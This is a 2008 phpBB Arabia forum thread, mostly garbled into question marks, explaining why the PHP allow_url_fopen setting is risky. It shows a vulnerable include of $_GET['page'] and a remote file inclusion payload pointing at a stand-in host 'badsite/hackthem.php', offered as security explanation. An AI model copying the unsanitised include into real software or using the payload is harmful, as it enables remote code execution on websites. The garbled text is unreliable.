منتديات phpBBArabia

مرسل: **السبت مارس 01, 2008 3:44 pm**

?????? ????? ? ???? ???? ???????
?????? ?? ???? ??? ??????? ????? ????? ?? ???? ????? ????? ?????? .
? ????? ???? ? ?? ?? ??????? ???? ??? ??? ?????? allow_url_fopen ? ????? ???? ?? ???? ????????? ??? ???? ?? ????? ???? ?? ???? ?????? ??????? ? ?????? ?????? ???? ? ?? ???? ????? ? ?? ????? ???? ??? ??????? ??????? ?? ??? ?? ?????? ????? ??????? ??? ?????? ???????? ??????? ???????

مرسل: **السبت مارس 01, 2008 5:08 pm**

http://www.phpbbarabia.com/viewtopic.php?f=32&t=29886" onclick="window.open(this.href);return false;

مرسل: **السبت مارس 15, 2008 7:50 pm**

???? ????? ?????? ??????? ?? ???

http://www.phpbb.com/community/viewtopi ... a&start=45" onclick="window.open(this.href);return false;

????? ??? ?? ?????? ???? ????? ?? ????? ??? allow_url_fopen ???? ?? ?????? ???? ?? ???? ???? ?? ?? ??????? ??? ?? ????? ??? ?????? ?? ??????? ??? ??????? ??????? ???????? ?? ??? ????????? ?????? ??? php ???? ????? ?????? ?????? ???????

allow_url_fopen ???? ?? ???? ?????? ??????? ??? ?? ?????? ??? ??? ??? iframe

????? ??? ?? ?? ????? ???? ????? ???? ????? ???? ??? ?????. ???? ?????? ?? ??????? ??? ????? ?????? ????? ???? ?????? ?????? ..........

??? ???? ???? ????? !!!

???? ??? ???? ?? ???? ???? ???? ?????? ?????? ????????? ???? ?? ????? ???? ??????? ??? iframe

????? ?????? ??? ???? (??????) ???? (???????) ??? (???????) ????? ?? ???? ????? ??????? ?? ???? ???? ?????????

???? ???? ???? ??? contact ?? ???? ???????? ???? ??? ?????? ???????? index.php?page=contact.php

???? ???? ????? ????? ???? ????? ????? ?????? ??????? ?? ???????

كود: تحديد الكل

//??? ??? ???? ?????? ???? ?? ??? ????? ?? ???? ??????
if ($_GET["page"] == NULL)
		
{
			//???? ?????? ???????
			include("page_main.php");
}
	//??? ??? ??? ??? ???
	else
		{
			//???? ?????? ?????? ?? ??????? ???? ?? ??????
			include("$_GET[page]");
		}

??? !!! ??? ???? ?????? allow_url_fopen ?????? ???? ??????? ?? ???????? ???? ?????? ?????

????? ?? ?? ???? ??? ????? ??? php ?????? ???? ???? ???? ???? ??????? ?????? **?? ?????? ?????? ?? ??? ???? ???????** ??????? ??? ???? ?? ???? ????? ??????

index.php?page=http://badsite/hackthem.php

????? ?????? ?? ?????

كود: تحديد الكل

include("http://badsite/hackthem.php");

???? ?? ?????? allow_url_fopen ??????? ????? hackthem.php ???? ?? ????? ????? ???? ??? ?????? ??? ??? ???? ?? ??? ????? ??????? ?? ?????

??? ??? ???? ???? ??? allow_url_fopen ????? ??? ???? ????? ???? ????? (??? ??????? ???????).

??? ??? ??? ?? ?? ?????? ??? allow_url_fopen ????? ??????? ???? ??? php ??????? ?????? ?? ??? ????????? ???????

كود: تحديد الكل

strip_tags()
nl2br()
htmlspecialchars()

???? ??? ???? ???? ?????? ?? ???? php ?????? ????? ????????? ???? ?? ????? ????????

منتديات phpBBArabia

allow_url_fopen ما حلها

allow_url_fopen ?? ????

allow_url_fopen ?? ????

allow_url_fopen ?? ????